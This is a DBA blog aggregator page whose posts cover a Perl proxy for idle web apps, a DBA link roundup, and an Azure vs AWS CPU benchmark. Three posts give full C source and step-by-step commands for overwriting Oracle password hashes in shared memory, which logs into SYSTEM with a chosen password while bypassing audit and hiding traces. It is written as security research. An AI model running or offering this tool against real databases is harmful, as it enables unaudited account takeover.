Skip navigation.

DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates, and the speakers, for the Latin America Tour have been anounnced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that since there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably be still fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default, but if a request comes along, to be awaken and ran for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies http requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setting, it’s quite easy to have all my sub-domains point to the port running that proxy and have the waking-up-if-required and dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application, and only need a few more pieces, and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it goes inactive. For that I went for a simple mechanism. Using CHI to provides me with a persistent and central place to keep information for my application. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning by using plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting a PSGI application is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started/stopped from the CLI. And, which is more interesting for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet completed. The configuration should go in a YAML file, we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Unic too to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During this summer time in Northern hemisphere, and winter time in Southern hemisphere, the bloggers are solving key problems either by sitting besides the bonfire, or enjoying that bbq. This Log Buffer Edition shares both of these with them.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1ECThis program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.SEARCH FOR   :- 09F3A178C7F6F650REPLACE WITH :- E235D5FC5165F1ECEnter Y to continue :- Y/dev/shm/ora_orcl_20381697_76 replace string at 2099160replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2271972replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2320344replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_75 replace string at 994020replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_68 replace string at 2624228replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_37 replace string at 450614replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_35 replace string at 695886replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with CError: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.
.
.
.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. Creating a new virtual machine, using the “quick create” option with Oracle Linux, and choosing a 4-core “A3″ standard instance.

I must say I like the machine naming into built-in “clouadpp.net” DNS that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than AWS, though no more than a few minutes. And speaking of IP addresses, both start with 191.236. addresses assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry, due to the lack of north american IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a rows:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 mB/sec

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs and all from gzip, so no large system overhead here. Also, “%st”, time reported “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Having a look at throughput here, by creating a basic A3 instance “marc-cpu-basic” that otherwise matches exactly marc-cpu created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the identical stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a rows:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up Comparison chart

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than a standard instance, in spite of having the same CPU configuration.

Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
